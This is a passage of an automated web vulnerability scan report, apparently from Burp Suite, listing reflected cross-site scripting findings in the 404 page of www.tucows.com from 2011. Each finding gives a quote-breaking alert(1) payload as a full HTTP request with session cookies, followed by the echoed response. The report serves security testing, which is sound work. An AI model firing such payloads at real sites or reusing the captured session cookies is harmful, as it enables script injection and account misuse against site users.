Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images39d2e"-alert(1)-"560230630e8/newassets/contact.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.14. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40764"-alert(1)-"3559dd93eff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets40764"-alert(1)-"3559dd93eff/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets40764"-alert(1)-"3559dd93eff/contact.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.15. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffcf"-alert(1)-"e9260562356 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/contact.html3ffcf"-alert(1)-"e9260562356 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/contact.html3ffcf"-alert(1)-"e9260562356";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.16. http://www.tucows.com/images/newassets/contact.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c0c"-alert(1)-"83c957dbfec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/contact.html?28c0c"-alert(1)-"83c957dbfec=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/contact.html?28c0c"-alert(1)-"83c957dbfec=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.17. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe9d"-alert(1)-"8324c4abd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesafe9d"-alert(1)-"8324c4abd1e/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesafe9d"-alert(1)-"8324c4abd1e/newassets/includes/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.18. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87e88"-alert(1)-"29fef7fc009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets87e88"-alert(1)-"29fef7fc009/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets87e88"-alert(1)-"29fef7fc009/includes/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.19. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff73f"-alert(1)-"c3006f1651f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesff73f"-alert(1)-"c3006f1651f/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesff73f"-alert(1)-"c3006f1651f/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.20. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e6b"-alert(1)-"3078349caa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbarb8e6b"-alert(1)-"3078349caa2/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbarb8e6b"-alert(1)-"3078349caa2/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.21. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14a3c"-alert(1)-"0443944911d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.014a3c"-alert(1)-"0443944911d/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.014a3c"-alert(1)-"0443944911d/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.22. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 199e2"-alert(1)-"fac9720e4d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.0/css199e2"-alert(1)-"fac9720e4d9/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css199e2"-alert(1)-"fac9720e4d9/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.23. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26131"-alert(1)-"79cf1522983 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css26131"-alert(1)-"79cf1522983 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css26131"-alert(1)-"79cf1522983";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.24. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be67"-alert(1)-"26a6c055dc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css?5be67"-alert(1)-"26a6c055dc5=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
